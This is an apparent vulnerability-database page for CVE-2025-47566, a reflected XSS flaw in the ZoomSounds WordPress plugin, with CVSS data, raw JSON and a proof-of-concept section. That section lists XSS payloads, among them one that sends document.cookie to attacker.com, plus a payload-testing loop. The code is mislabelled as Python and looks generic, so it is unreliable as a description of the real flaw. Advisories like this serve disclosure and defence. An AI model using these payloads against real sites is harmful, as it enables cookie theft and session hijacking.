Security Vulnerability Report
中文
CVE-2025-47566 CVSS 7.1 HIGH

CVE-2025-47566

Published: 2025-12-31 20:15:43
Last Modified: 2026-04-28 19:32:26

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZoomSounds allows Reflected XSS.This issue affects ZoomSounds: from n/a through 6.91.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ZoomSounds WordPress Plugin <= 6.91

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-47566 ZoomSounds Reflected XSS PoC --> <!-- Target: WordPress site with ZoomSounds plugin <= 6.91 --> <!-- Basic XSS Payload --> https://target-site.com/?s=<script>alert(document.cookie)</script> <!-- Event Handler Payload (bypasses some filters) --> https://target-site.com/?s=<img src=x onerror=alert(document.domain)> <!-- Cookie Stealing Payload --> https://target-site.com/?s=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> <!-- Using JavaScript伪协议 --> https://target-site.com/?s=<a href="javascript:alert(document.cookie)">Click me</a> <!-- Automated PoC Testing Script --> const targetUrl = 'https://vulnerable-site.com'; const payloads = [ '<script>alert("XSS")</script>', '<img src=x onerror=alert(1)>', '<svg onload=alert(1)>', '<iframe src="javascript:alert(document.cookie)">' ]; payloads.forEach(payload => { const testUrl = `${targetUrl}?s=${encodeURIComponent(payload)}`; console.log(`Testing: ${testUrl}`); // In real testing, send request and check if payload is reflected unescaped });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47566", "sourceIdentifier": "[email protected]", "published": "2025-12-31T20:15:42.650", "lastModified": "2026-04-28T19:32:25.670", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZoomSounds allows Reflected XSS.This issue affects ZoomSounds: from n/a through 6.91."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en ZoomSounds permite XSS Reflejado. Este problema afecta a ZoomSounds: desde n/a hasta 6.91."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/dzs-zoomsounds/vulnerability/wordpress-zoomsounds-plugin-6-91-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}